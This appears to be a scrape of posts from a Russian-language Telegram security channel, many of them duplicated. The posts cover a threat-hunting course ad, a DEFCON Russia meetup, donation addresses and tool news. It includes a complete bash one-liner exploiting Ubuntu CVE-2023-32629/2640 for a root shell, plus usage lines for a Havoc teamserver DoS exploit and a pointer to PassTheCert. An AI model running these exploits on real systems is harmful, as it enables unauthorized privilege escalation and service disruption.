Сезон охоты за киберугрозами открыт. Получите навыки выявления аномалий в инфраструктуре с помощью формулировки гипотез и их дальнейшей проверки.
Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:
— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;
— отличать аномалии от легитимного поведения;
— понимать мышление злоумышленника;
— формулировать и проверять гипотезы о киберугрозах.
Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения.
Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:
— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;
— отличать аномалии от легитимного поведения;
— понимать мышление злоумышленника;
— формулировать и проверять гипотезы о киберугрозах.
Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения.
🔥12👍1
CVE-2023-32629 и CVE-2023-2640
Ubuntu Privilege Escalation
*
BASH одной строкой:
#ubuntu #lpe
Ubuntu Privilege Escalation
*
BASH одной строкой:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"#ubuntu #lpe
🔥38👍2
Это круто
Студия Speakeasy Productions сняла и опубликовала в открытом доступе документальный фильм
"eBPF: Unlocking the Kernel"
Студия Speakeasy Productions сняла и опубликовала в открытом доступе документальный фильм
"eBPF: Unlocking the Kernel"
YouTube
eBPF: Unlocking the Kernel [OFFICIAL DOCUMENTARY]
The official eBPF documentary.
In 2014, a group of engineers at Plumgrid needed to find an innovative and cost-effective solution to handle network traffic in SDN environments. What they created was a landmark in the industry known as the extended Berkeley…
In 2014, a group of engineers at Plumgrid needed to find an innovative and cost-effective solution to handle network traffic in SDN environments. What they created was a landmark in the industry known as the extended Berkeley…
👍16👌2🔥1
Напоминаем !
Завтра пройдет встреча DEFCON Russia
*
* Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен»
* Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)
* Формат: офлайн + онлайн-трансляция
* зарегистрироваться
*
Приходите, пообщаемся 😜
#defcon #spb
Завтра пройдет встреча DEFCON Russia
*
* Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен»
* Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)
* Формат: офлайн + онлайн-трансляция
* зарегистрироваться
*
Приходите, пообщаемся 😜
#defcon #spb
👍8🔥4😱1
This media is not supported in your browser
VIEW IN TELEGRAM
С днем рождения !!!
Сегодня Proxy Bar исполняется 2 года
***
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Bitcoin
Сегодня Proxy Bar исполняется 2 года
***
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Bitcoin
bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9
Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k
#ДеньРождения🔥100👍8😱4👌2
PassTheCert
*
Бывает контроллеры домена не поддерживают PKINIT. Это может быть связано с тем, что в их сертификатах нет EKU для входа в систему со смарт-картой. Однако несколько протоколов, включая LDAP, поддерживают Schannel, обеспечивая таким образом аутентификацию через TLS.
И вот пацаны с района (
*
LINK
*
Бывает контроллеры домена не поддерживают PKINIT. Это может быть связано с тем, что в их сертификатах нет EKU для входа в систему со смарт-картой. Однако несколько протоколов, включая LDAP, поддерживают Schannel, обеспечивая таким образом аутентификацию через TLS.
И вот пацаны с района (
возможно Мытищи) создали небольшой инструмент для проверки концепции, который позволяет выполнять аутентификацию на сервере LDAP/S с сертификатом для всяких там атак.*
LINK
🔥18😱3👍2
HavocExploit
Праздник у всех любителей фреймфорка Havoc ( post-exploitation command and control framework )
*
DOS_exploit
*
Usage:
Праздник у всех любителей фреймфорка Havoc ( post-exploitation command and control framework )
*
DOS_exploit
*
Usage:
pip install -r requirements.txt
./exploit.py -t teamserverip -p port
#havoc🔥14👍1
Мечтает ли товарищ майор об элетроТелеге ?
Но не спеши погружаться в философские думы, мой юный друг !
Ведь в нашей студии, прости хоспаде - Telegram Explorer
У которого в описании ЖИР жирокъ
Ну прям RSS на базе православной тележки.
Но разговоры в сторону - немедленно выкатываем в продакшен !
#Fu
Но не спеши погружаться в философские думы, мой юный друг !
Ведь в нашей студии, прости хоспаде - Telegram Explorer
У которого в описании ЖИР жирокъ
Ну прям RSS на базе православной тележки.
Но разговоры в сторону - немедленно выкатываем в продакшен !
#Fu
👍14😱5👌1